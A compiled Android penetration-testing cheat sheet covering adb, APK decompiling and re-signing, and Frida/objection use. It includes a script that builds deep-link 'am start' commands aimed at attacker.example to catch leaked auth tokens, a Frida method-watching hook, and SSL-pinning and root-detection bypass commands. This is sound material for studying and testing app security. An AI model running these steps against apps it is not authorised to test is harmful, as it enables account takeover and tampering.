- https://www.hackingarticles.in/android-penetration-testing-apk-reverse-engineering/
- https://www.hackingarticles.in/android-penetration-testing-apk-reversing-part-2/
- https://www.hackingarticles.in/android-pentest-deep-link-exploitation/
- https://www.hackingarticles.in/android-penetration-testing-webview-attacks/
- https://www.hackingarticles.in/android-penetration-testing-frida/
- https://www.hackingarticles.in/android-pentest-lab-setup-adb-command-cheatsheet/
- https://www.hackingarticles.in/android-hooking-and-sslpinning-using-objection-framework/
- https://www.hackingarticles.in/android-penetration-testing-drozer/
- https://www.hackingarticles.in/android-pentest-automated-analysis-using-mobsf/
# decode the APK, then pull every http(s) URL out of the smali/resources; anew (tomnomnom) de-duplicates and the last grep drops framework/Google noise
apktool d com.uber -o uberAPK; grep -Phro "(https?://)[\w\,-/]+[\"\']" uberAPK/ | sed 's#"##g' | anew | grep -v "w3\|android\|github\|schemes.android\|google\|goo.gl"
- Download the jadx decompiler and install adb
- Decompile the APK and open AndroidManifest.xml
- Find all browsable activities: those with an <intent-filter> declaring action android.intent.action.VIEW, category android.intent.category.BROWSABLE and an http/https <data android:scheme>
- For each such activity run
adb shell am start -n app_package_name/component_name -a android.intent.action.VIEW -d http://google.com
(or point -d at a domain you control) and watch in Burp for any request to http://google.com or your domain
- If the domain gets opened, you have found a vulnerability. Now inspect the request: if it carries auth tokens you are looking at a potential account takeover; if not, try other techniques to obtain PII. In the worst case the finding is rewarded roughly like an XSS.
- If the activity merely lets you open arbitrary links, that is still the lower-impact version of this finding; use your own domain instead of http://google.com in step 4 so you can see exactly what the app sends.
- ADB Cheatsheet
- Testing with Frida
- APK Reverse Engineering - 1
- APK Reverse Engineering - 2
- Android Hooking and SSLPinning using Objection Framework
- Android Mobile Exploitation with Evil-Droid
Android Debug Bridge (adb) is a command-line utility that provides debugging access to Android devices. It works over USB as well as over TCP (for example to an emulator, or to a device with adb listening on port 5555).
# list connected devices
adb devices -l
# connect to a virtual or network-attached device
adb connect 192.168.52.104
# open a shell on the device
adb shell
# install an APK
adb install <apk_file.apk>
# go to the per-app data directory (readable only as root, or for a debuggable app via run-as)
cd /data/data/
# list installed apps (one directory per package)
ls | tail -10
# start adb server
adb start-server
# stop adb server
adb kill-server
# run adb as root
adb root
# revert back to unroot
adb unroot
# monitor logs
adb logcat
# push files to device
adb push <source_file_name> <destination_folder>
# pull files from device
adb pull <source_file_name> <destination_folder>
# list installed apps
adb shell pm list packages | tail -10
# list system apps
adb shell pm list packages -s
# list third party apps
adb shell pm list packages -3
# clear application data
adb shell pm clear <package_name>
# view installation path of package
adb shell pm path <package_name>
# View running services in a package
adb shell dumpsys activity services <package_name>
# Extracting information about a package
adb shell dumpsys package <package_name>
# View foreground activity
adb shell dumpsys activity activities | grep mResumedActivity
# Information about activities in a specific package
adb shell dumpsys activity activities | grep <package_name>
# start activity
adb shell am start -n <package_name>/<activity>
# start a service (the component is the service class, not an activity; non-exported services need root)
adb shell am startservice -n <package_name>/<service>
# stop a service
adb shell am stopservice -n <package_name>/<service>
# get the PID of a running app
adb shell pidof <package_name>
# then filter logcat by that PID, e.g. 7399 (recent Android builds also accept a --pid filter on logcat)
adb logcat | grep 7399
There are many ways to decompile an APK.
Using apktool (smali code plus resources):
# decompile (-f overwrites an existing output directory, -r keeps resources undecoded, which avoids most rebuild errors)
apktool d -f -r <apk_file>
# rebuild after editing
apktool b <app_files_folder> -o <output_apk_file_name>
For Java-level decompilation use Bytecode Viewer or jadx-gui.
A rebuilt APK is unsigned and will not install until it is signed. Create a keystore and sign with jarsigner:
keytool -genkey -v -keystore harshit_key.keystore -alias harsh_key -keyalg RSA -keysize 2048 -validity 10000
jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore harshit_key.keystore new_uncrackable.apk harsh_key
Caveat: jarsigner only produces a v1 (JAR) signature and SHA-1 is deprecated. Apps targeting API 30 (Android 11) or later must carry a v2 or newer APK signature, so prefer apksigner from the SDK build-tools, running zipalign before it. Uninstall the original app first, because the rebuilt APK is signed with a different key.
Key elements of AndroidManifest.xml:
<uses-permission android:name="string" /> – permissions the app requests
<activity> – each activity (screen) in the app; android:exported controls whether other apps can start it (an <intent-filter> makes it exported unless exported="false", and Android 12+ requires the attribute to be explicit when filters are present)
<intent-filter> – the intents a component responds to
<data android:scheme="string" /> – URI schemes the filter accepts (http/https together with the BROWSABLE category makes a deep link)
<action android:name="string" /> – the action the intent performs (e.g. android.intent.action.VIEW)
<uses-configuration> – hardware/software input requirements (keyboard, touchscreen, navigation)
<uses-sdk> – minimum/target/maximum Android API levels
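The deep-link procedure above (find browsable activities, fire each one with am start and watch for the request) and the manifest elements just listed can be automated against the AndroidManifest.xml that apktool decodes. The script below is an added example, not code from the original page or from any of the linked tools; the sample manifest, the package com.example.rideshare and the host attacker.example are constructed for illustration.

```python
"""Find browsable (deep-link) activities and requested permissions in an
apktool-decoded AndroidManifest.xml and print the adb command to fire each one.

Added example (not from the original page). Rules applied: an activity is reachable
via a browser when one of its <intent-filter>s declares action VIEW, category
BROWSABLE and a <data android:scheme>; a component with an <intent-filter> is
exported unless android:exported="false". Sample manifest below is constructed."""
import sys
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
ACTION_VIEW = "android.intent.action.VIEW"
CATEGORY_BROWSABLE = "android.intent.category.BROWSABLE"


def _attr(elem, name):
    """Read an android:<name> attribute (ElementTree wants the full namespace)."""
    return elem.get("{%s}%s" % (ANDROID_NS, name))


def component_name(package, raw_name):
    """Expand the shorthand names a manifest may use: ".Foo" or "Foo"."""
    if raw_name.startswith("."):
        return package + raw_name
    if "." not in raw_name:
        return package + "." + raw_name
    return raw_name


def browsable_activities(manifest_xml):
    """[(component, schemes, hosts, exported)] for each activity/activity-alias
    that carries a VIEW + BROWSABLE intent-filter with at least one data scheme."""
    root = ET.fromstring(manifest_xml)
    package = root.get("package")
    app = root.find("application")
    results = []
    if app is None:
        return results
    for act in app.findall("activity") + app.findall("activity-alias"):
        filters = act.findall("intent-filter")
        exported_attr = _attr(act, "exported")
        exported = exported_attr == "true" or (exported_attr is None and bool(filters))
        schemes, hosts = set(), set()
        for f in filters:
            actions = {_attr(a, "name") for a in f.findall("action")}
            categories = {_attr(c, "name") for c in f.findall("category")}
            if ACTION_VIEW not in actions or CATEGORY_BROWSABLE not in categories:
                continue
            for d in f.findall("data"):
                if _attr(d, "scheme"):
                    schemes.add(_attr(d, "scheme"))
                if _attr(d, "host"):
                    hosts.add(_attr(d, "host"))
        if schemes:
            comp = component_name(package, _attr(act, "name"))
            results.append((comp, sorted(schemes), sorted(hosts), exported))
    return results


def requested_permissions(manifest_xml):
    """All <uses-permission> names, sorted."""
    root = ET.fromstring(manifest_xml)
    return sorted(_attr(p, "name") for p in root.findall("uses-permission"))


def am_start_commands(manifest_xml, test_host="attacker.example"):
    """One `adb shell am start` per exported browsable activity and scheme. With -n
    the component is explicit, so the filter's android:host is never matched and a
    host we control is delivered even to activities declaring verified app links."""
    package = ET.fromstring(manifest_xml).get("package")
    cmds = []
    for comp, schemes, _hosts, exported in browsable_activities(manifest_xml):
        if not exported:
            continue  # not reachable from another app or the browser
        for scheme in schemes:
            url = "%s://%s/" % (scheme, test_host)
            cmds.append("adb shell am start -n %s/%s -a %s -d '%s'" % (package, comp, ACTION_VIEW, url))
    return cmds


# Constructed sample of what `apktool d` writes; not a real app's manifest.
SAMPLE_MANIFEST = """<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.example.rideshare">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.READ_CONTACTS"/>
  <application>
    <activity android:name=".MainActivity">
      <intent-filter><action android:name="android.intent.action.MAIN"/>
        <category android:name="android.intent.category.LAUNCHER"/></intent-filter>
    </activity>
    <activity android:name=".WebViewActivity">
      <intent-filter>
        <action android:name="android.intent.action.VIEW"/>
        <category android:name="android.intent.category.DEFAULT"/>
        <category android:name="android.intent.category.BROWSABLE"/>
        <data android:scheme="https" android:host="ride.example.com"/>
        <data android:scheme="http"/>
      </intent-filter>
    </activity>
    <activity android:name="com.example.rideshare.PayActivity" android:exported="false">
      <intent-filter>
        <action android:name="android.intent.action.VIEW"/>
        <category android:name="android.intent.category.BROWSABLE"/>
        <data android:scheme="rideshare"/>
      </intent-filter>
    </activity>
  </application>
</manifest>"""

if __name__ == "__main__":
    # usage: python manifest_audit.py [path/to/AndroidManifest.xml]
    xml_text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_MANIFEST
    print("permissions:", ", ".join(requested_permissions(xml_text)))
    for comp, schemes, hosts, exported in browsable_activities(xml_text):
        print("%s schemes=%s hosts=%s exported=%s" % (comp, schemes, hosts, exported))
    for cmd in am_start_commands(xml_text):
        print(cmd)
```

On the sample, PayActivity is listed as browsable but skipped for commands because it is not exported; in a real test that is still worth noting, since a non-exported handler for a custom scheme can become reachable through an exported activity that forwards intents.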
# connect to the emulator/device (frida-server needs root, so adb root first on a rooted device)
adb connect 192.168.27.101:5555
# push frida-server (its version must match the frida client on the host) to a writable, executable location and start it; /tmp does not exist on Android
adb push frida-server-14.1.3-android-x86_64 /data/local/tmp/frida-server
adb shell "chmod 755 /data/local/tmp/frida-server && /data/local/tmp/frida-server &"
# install objection (it pulls in the frida Python bindings, so pin versions to match frida-server)
pip3 install objection
# attach to the app and get an objection shell
objection --gadget <package_name> explore
- Set proxies in device and install the CA certificates
- Run below command to bypass SSL Pinning
android sslpinning disable
# list the methods of a class
android hooking list class_methods <class_name>
# search loaded classes by keyword
android hooking search classes main
To watch a class and see which of its methods get called, in what order and with which arguments and return values (useful for deciding where to hook), run:
android hooking watch class <class_name> --dump-args --dump-backtrace --dump-return
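objection's watch command is itself a Frida hook. The script below is an added example, not code from the original page or from objection, that rebuilds the same watch with the Frida Python bindings: it hooks every overload of every declared method of one class, lets the original run, and reports arguments, return value and a Java backtrace. It assumes a frida-server of the same version as the host's frida package is running as root on the device; the package and class names on the command line are whatever the tester supplies.

```python
"""Watch every method of one Java class at runtime with Frida: log the arguments,
the return value and a Java backtrace for each call, i.e. what objection's
`android hooking watch class` does, rebuilt as a short Frida script.

Added example, not from the original page or from objection's code base. Assumes
the frida Python bindings on the host (pip install frida-tools) and a frida-server
of the same version already running as root on the device or emulator."""
import json
import sys

# Frida Java-bridge hook. CLASS_NAME is replaced by the Python side with a JS
# string literal. The script enumerates the declared methods of the class, hooks
# every overload, runs the original and reports each call with send().
WATCH_JS = r"""
Java.perform(function () {
  var target = Java.use(CLASS_NAME);
  var Log = Java.use("android.util.Log");
  var Exception = Java.use("java.lang.Exception");

  // distinct method names declared on the class itself (constructors excluded)
  var names = target.class.getDeclaredMethods().map(function (m) {
    return String(m.getName());
  }).filter(function (n, i, all) { return all.indexOf(n) === i; });

  names.forEach(function (name) {
    if (!target[name]) { return; }  // no wrapper, e.g. some synthetic members
    target[name].overloads.forEach(function (overload) {
      var signature = name + "(" + overload.argumentTypes.map(function (t) {
        return t.className;
      }).join(", ") + ")";
      overload.implementation = function () {
        var args = [];
        for (var i = 0; i < arguments.length; i++) { args.push(String(arguments[i])); }
        var ret = overload.apply(this, arguments);  // run the real method
        send({cls: CLASS_NAME, method: signature, args: args, ret: String(ret),
              backtrace: String(Log.getStackTraceString(Exception.$new()))});
        return ret;
      };
    });
  });
  send({cls: CLASS_NAME, hooked: names.length});
});
"""


def build_watch_script(class_name):
    """Inline the target class into the hook as a JS string literal."""
    return WATCH_JS.replace("CLASS_NAME", json.dumps(class_name))


def format_event(payload):
    """Render one send() payload as a single log line; only the top frame of the
    backtrace is shown, the full text stays in payload["backtrace"]."""
    if "hooked" in payload:
        return "[+] hooked %d methods of %s" % (payload["hooked"], payload["cls"])
    frames = [l.strip() for l in payload.get("backtrace", "").splitlines() if l.strip().startswith("at ")]
    top = frames[0] if frames else "?"
    return "%s.%s args=%s ret=%s <- %s" % (payload["cls"], payload["method"], payload["args"], payload["ret"], top)


def watch(package, class_name):
    """Spawn the app suspended, load the hook, resume it and print events."""
    import frida  # imported here so the helpers above work without a device
    device = frida.get_usb_device()
    pid = device.spawn([package])  # spawn suspended so early calls are caught too
    session = device.attach(pid)
    script = session.create_script(build_watch_script(class_name))

    def on_message(message, _data):
        if message["type"] == "send":
            print(format_event(message["payload"]))
        else:
            print(message, file=sys.stderr)  # hook errors

    script.on("message", on_message)
    script.load()
    device.resume(pid)
    sys.stdin.read()  # keep the hooks alive until Ctrl-D


if __name__ == "__main__":
    # usage: python watch_class.py <package> <fully.qualified.Class>
    watch(sys.argv[1], sys.argv[2])
```

Spawning rather than attaching matters for classes used during startup (root checks, key derivation): attaching to a running process misses everything that already happened.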
# check whether the current activity sets FLAG_SECURE (blocks screenshots and screen recording)
android ui FLAG_SECURE
# set or clear FLAG_SECURE on the current activity
android ui FLAG_SECURE true
android ui FLAG_SECURE false
# launch an activity directly by class name (exported ones are reachable without any UI path)
android intent launch_activity
android intent launch_activity <activity>
# patch common root-detection checks
android root disable